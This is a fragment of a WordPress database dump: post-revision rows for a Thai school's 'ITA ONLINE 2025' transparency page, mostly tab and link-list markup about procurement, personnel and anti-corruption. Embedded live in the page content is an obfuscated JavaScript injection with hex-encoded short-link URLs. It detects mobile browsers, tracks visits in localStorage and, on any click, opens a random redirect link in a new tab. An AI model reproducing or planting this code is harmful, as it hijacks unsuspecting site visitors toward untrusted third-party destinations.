data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":3,\"uniqueID\":\"bab0c3-88\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-3 kt-inner-tabbab0c3-88\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_948636-84\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_948636-84 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_3edff3-bb\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_3edff3-bb\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_9ab5d8-54\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_9ab5d8-54\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":4,\"uniqueID\":\"942a96-06\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-4 kt-inner-tab942a96-06\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_37f8e2-2d\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_37f8e2-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_12bed0-a6\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_12bed0-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_7e4f7d-a0\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_7e4f7d-a0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"1003\">ประมวลจริยธรรม และการขับเคลื่อนจริยธรรม</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":5,\"uniqueID\":\"42916d-7b\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-5 kt-inner-tab42916d-7b\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_25468b-f6\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_25468b-f6 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_ae038f-10\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_ae038f-10\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_667e50-fd\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_667e50-fd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":6,\"uniqueID\":\"357ff8-b0\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-6 kt-inner-tab357ff8-b0\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_363bba-05\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_363bba-05 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_c0e085-63\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_c0e085-63\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์และการสร้างวัฒนธรรม ตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_29fead-8e\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_29fead-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1032\">การประเมินความเสี่ยงที่อาจเกิดการให้หรือรับสินบนจากการดำเนินงานตามภารกิจของสถานศึกษา  ประจำปีงบประมาณ พ.ศ .2568</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":7,\"uniqueID\":\"77d9b7-d1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-7 kt-inner-tab77d9b7-d1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_c6c267-89\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_c6c267-89 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_64d6b5-67\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_64d6b5-67\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1010\" data-type=\"page\" data-id=\"1010\">แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_106c4d-48\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_106c4d-48\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n<!-- /wp:generateblocks/container -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','ITA ONLINE 2025','','inherit','closed','closed','','871-revision-v1','','','2025-06-27 11:36:20','2025-06-27 04:36:20','',871,'http://pakhaeng.ssk.in.th/?p=1484',0,'revision','',0),
(1485,1,'2025-06-27 11:55:01','2025-06-27 04:55:01','<!-- wp:generateblocks/image {\"uniqueId\":\"285d6904\",\"mediaId\":1259,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-285d6904\"><img class=\"gb-image gb-image-285d6904\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/2025.png\" alt=\"\" title=\"2025\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f5e8d6af\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:kadence/tabs {\"uniqueID\":\"871_e416be-74\",\"tabCount\":7,\"currentTab\":2,\"contentBgColor\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"contentBorderStyles\":[{\"top\":[\"#0a6689\",\"\",3],\"right\":[\"#0a6689\",\"\",0],\"bottom\":[\"#0a6689\",\"\",0],\"left\":[\"#0a6689\",\"\",0],\"unit\":\"px\"}],\"titles\":[{\"text\":\"ข้อมูลพื้นฐาน\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารงานและการใช้จ่ายงบประมาณ\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการจัดซื้อจัดจ้าง\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารและพัฒนาทรัพยากรบุคคล\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมคุณธรรมและความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"}],\"iSize\":16,\"titleColor\":\"#000000\",\"titleColorHover\":\"#ffffff\",\"titleColorActive\":\"#ffffff\",\"titleBg\":\"#f78da7\",\"titleBgHover\":\"#cf2e2e\",\"titleBgActive\":\"#cf2e2e\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#f78da7\",\"titleBorderActive\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderWidth\":[0,0,0,0],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,0,0],\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"fontWeight\":\"bold\",\"verticalTabWidth\":[38,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id871_e416be-74 kt-tabs-has-7-tabs kt-active-tab-2 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-left \"><ul class=\"kt-tabs-title-list\"><li id=\"tab-\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span class=\"kt-title-text\">ข้อมูลพื้นฐาน</span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-active\"><a href=\"#tab-strongstrong\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span class=\"kt-title-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-3 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"3\" class=\"kt-tab-title kt-tab-title-3 \"><span class=\"kt-title-text\"><strong>การจัดซื้อจัดจ้าง</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-4 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"4\" class=\"kt-tab-title kt-tab-title-4 \"><span class=\"kt-title-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-5 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"5\" class=\"kt-tab-title kt-tab-title-5 \"><span class=\"kt-title-text\"><strong>การส่งเสริมความโปร่งใส</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-6 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"6\" class=\"kt-tab-title kt-tab-title-6 \"><span class=\"kt-title-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-7 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"7\" class=\"kt-tab-title kt-tab-title-7 \"><span class=\"kt-title-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"cda4f9-0b\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tabcda4f9-0b\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_f98827-df\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_f98827-df kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_d803ff-d2\",\"width\":4,\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_d803ff-d2\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a>และอำนาจหน้าที่</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_921bc2-5c\",\"width\":4,\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_921bc2-5c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469↗\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem 